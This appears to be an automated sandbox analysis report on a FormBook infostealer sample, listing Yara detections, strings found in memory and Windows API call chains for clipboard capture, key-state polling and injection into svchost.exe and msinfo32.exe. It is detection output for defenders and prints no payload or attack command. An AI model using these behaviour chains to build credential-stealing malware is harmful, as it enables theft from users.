Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.00000000057EA000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.0000000005AFA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:400
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: msinfo32.exe, 00000006.00000003.2335062929.0000000007DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3513710027.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000062D4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ventraip.com.au/favicon.ico
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0034425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,

0_2_0034425A

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00344458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00344458

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

0_2_0034425A

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00330219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00330219

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0035CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0035CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: This is a third-party compiled AutoIt script.	0_2_002D3B4C
Source: 6ddrUd6iQo.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 6ddrUd6iQo.exe, 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3e92e501-1
Source: 6ddrUd6iQo.exe, 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e5157d70-f

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_002D3633
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C220 NtdllDialogWndProc_W,	0_2_0035C220
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C27C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_0035C27C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_0035C49C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_0035C788
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C86D SendMessageW,NtdllDialogWndProc_W,	0_2_0035C86D
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0035C8EE
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CB7F NtdllDialogWndProc_W,	0_2_0035CB7F
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CB50 NtdllDialogWndProc_W,	0_2_0035CB50
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CBAE NtdllDialogWndProc_W,	0_2_0035CBAE
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CBF9 NtdllDialogWndProc_W,	0_2_0035CBF9
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CC2E ClientToScreen,NtdllDialogWndProc_W,	0_2_0035CC2E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CD6C GetWindowLongW,NtdllDialogWndProc_W,	0_2_0035CD6C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_0035CDAC
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,	0_2_002D1287
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_002D1290
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D167D NtdllDialogWndProc_W,	0_2_002D167D
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D16B5 NtdllDialogWndProc_W,	0_2_002D16B5
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D16DE GetParent,NtdllDialogWndProc_W,	0_2_002D16DE
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035D6C6 NtdllDialogWndProc_W,	0_2_0035D6C6
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_0035D74C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D189B NtdllDialogWndProc_W,	0_2_002D189B
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035DA9A NtdllDialogWndProc_W,	0_2_0035DA9A
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035BF4D NtdllDialogWndProc_W,CallWindowProcW,	0_2_0035BF4D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C283 NtClose,	1_2_0042C283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872B60 NtClose,LdrInitializeThunk,	1_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,	1_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03874340 NtSetContextThread,	1_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03874650 NtSuspendThread,	1_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872B80 NtQueryInformationFile,	1_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BA0 NtEnumerateValueKey,	1_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BE0 NtQueryValueKey,	1_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BF0 NtAllocateVirtualMemory,	1_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AB0 NtWaitForSingleObject,	1_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AD0 NtReadFile,	1_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AF0 NtWriteFile,	1_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F90 NtProtectVirtualMemory,	1_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FA0 NtQuerySection,	1_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FB0 NtResumeThread,	1_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FE0 NtCreateFile,	1_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F30 NtCreateSection,	1_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F60 NtCreateProcessEx,	1_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872E80 NtReadVirtualMemory,	1_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872EA0 NtAdjustPrivilegesToken,	1_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872EE0 NtQueueApcThread,	1_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872E30 NtWriteVirtualMemory,	1_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DB0 NtEnumerateKey,	1_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DD0 NtDelayExecution,	1_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D00 NtSetInformationFile,	1_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D10 NtMapViewOfSection,	1_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D30 NtUnmapViewOfSection,	1_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CA0 NtQueryInformationToken,	1_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CC0 NtQueryVirtualMemory,	1_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CF0 NtOpenProcess,	1_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C00 NtQueryInformationProcess,	1_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C60 NtCreateKey,	1_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C70 NtFreeVirtualMemory,	1_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873090 NtSetValueKey,	1_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873010 NtOpenDirectoryObject,	1_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038739B0 NtGetContextThread,	1_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873D10 NtOpenProcessToken,	1_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873D70 NtOpenThread,	1_2_03873D70
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA4650 NtSuspendThread,LdrInitializeThunk,	6_2_04CA4650
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA4340 NtSetContextThread,LdrInitializeThunk,	6_2_04CA4340
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04CA2CA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2C60 NtCreateKey,LdrInitializeThunk,	6_2_04CA2C60
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04CA2C70
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04CA2DD0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04CA2DF0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04CA2D10
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04CA2D30
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_04CA2EE0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04CA2E80
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2FE0 NtCreateFile,LdrInitializeThunk,	6_2_04CA2FE0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2FB0 NtResumeThread,LdrInitializeThunk,	6_2_04CA2FB0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2F30 NtCreateSection,LdrInitializeThunk,	6_2_04CA2F30
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2AD0 NtReadFile,LdrInitializeThunk,	6_2_04CA2AD0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2AF0 NtWriteFile,LdrInitializeThunk,	6_2_04CA2AF0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04CA2BE0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04CA2BF0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04CA2BA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2B60 NtClose,LdrInitializeThunk,	6_2_04CA2B60
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA35C0 NtCreateMutant,LdrInitializeThunk,	6_2_04CA35C0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA39B0 NtGetContextThread,LdrInitializeThunk,	6_2_04CA39B0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2CC0 NtQueryVirtualMemory,	6_2_04CA2CC0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2CF0 NtOpenProcess,	6_2_04CA2CF0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2C00 NtQueryInformationProcess,	6_2_04CA2C00
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2DB0 NtEnumerateKey,	6_2_04CA2DB0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2D00 NtSetInformationFile,	6_2_04CA2D00
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2EA0 NtAdjustPrivilegesToken,	6_2_04CA2EA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2E30 NtWriteVirtualMemory,	6_2_04CA2E30
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2F90 NtProtectVirtualMemory,	6_2_04CA2F90
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2FA0 NtQuerySection,	6_2_04CA2FA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2F60 NtCreateProcessEx,	6_2_04CA2F60
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2AB0 NtWaitForSingleObject,	6_2_04CA2AB0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA2B80 NtQueryInformationFile,	6_2_04CA2B80
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA3090 NtSetValueKey,	6_2_04CA3090
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA3010 NtOpenDirectoryObject,	6_2_04CA3010
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA3D70 NtOpenThread,	6_2_04CA3D70
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA3D10 NtOpenProcessToken,	6_2_04CA3D10
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C28A20 NtCreateFile,	6_2_02C28A20
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C28B90 NtReadFile,	6_2_02C28B90
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C28E90 NtAllocateVirtualMemory,	6_2_02C28E90
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C28C80 NtDeleteFile,	6_2_02C28C80
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C28D20 NtClose,	6_2_02C28D20

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00334021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00334021

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00328858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74775590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00328858

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0033545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0033545F

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002DE800	0_2_002DE800
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FDBB5	0_2_002FDBB5
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002DE060	0_2_002DE060
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0035804A	0_2_0035804A
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E4140	0_2_002E4140
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F2405	0_2_002F2405
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00306522	0_2_00306522
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0030267E	0_2_0030267E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00350665	0_2_00350665
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F283A	0_2_002F283A
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E6843	0_2_002E6843
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_003089DF	0_2_003089DF
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E8A0E	0_2_002E8A0E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00306A94	0_2_00306A94
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00350AE2	0_2_00350AE2
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00338B13	0_2_00338B13
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0032EB07	0_2_0032EB07
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FCD61	0_2_002FCD61
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00307006	0_2_00307006
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E710E	0_2_002E710E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E3190	0_2_002E3190
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D1287	0_2_002D1287
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F33C7	0_2_002F33C7
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FF419	0_2_002FF419
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E5680	0_2_002E5680
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F16C4	0_2_002F16C4
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002E58C0	0_2_002E58C0
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F78D3	0_2_002F78D3
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F1BB8	0_2_002F1BB8
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00309D05	0_2_00309D05
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002DFE40	0_2_002DFE40
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FBFE6	0_2_002FBFE6
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F1FD0	0_2_002F1FD0
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_018F3610	0_2_018F3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402840	1_2_00402840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004100A3	1_2_004100A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E903	1_2_0042E903
